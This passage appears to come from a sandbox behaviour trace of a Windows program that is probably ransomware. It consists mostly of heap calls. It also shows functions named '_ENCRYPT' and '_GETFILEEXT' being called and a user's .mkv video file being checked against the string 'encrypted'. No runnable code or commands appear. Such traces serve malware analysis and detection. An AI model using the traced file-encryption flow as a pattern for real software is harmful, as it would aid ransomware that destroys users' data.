hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.498] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.500] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.500] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.514] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.514] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0042.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.515] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.515] CloseHandle (hObject=0x128) returned 1 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.515] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.516] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.516] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.516] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.546] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.546] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.547] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.547] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.547] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.547] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65773250, ftCreationTime.dwHighDateTime=0x1d5b807, ftLastAccessTime.dwLowDateTime=0x1244f2b0, ftLastAccessTime.dwHighDateTime=0x1d5b948, ftLastWriteTime.dwLowDateTime=0x1244f2b0, ftLastWriteTime.dwHighDateTime=0x1d5b948, nFileSizeHigh=0x0, nFileSizeLow=0x18f35, dwReserved0=0x0, dwReserved1=0x777648, cFileName="mRin.mkv", cAlternateFileName="")) returned 0x7c20c0 [0042.547] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.548] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65773250, ftCreationTime.dwHighDateTime=0x1d5b807, ftLastAccessTime.dwLowDateTime=0x1244f2b0, ftLastAccessTime.dwHighDateTime=0x1d5b948, ftLastWriteTime.dwLowDateTime=0x1244f2b0, ftLastWriteTime.dwHighDateTime=0x1d5b948, nFileSizeHigh=0x0, nFileSizeLow=0x18f35, dwReserved0=0x0, dwReserved1=0x777648, cFileName="mRin.mkv", cAlternateFileName="")) returned 0x7c20c0 [0042.548] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.548] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, 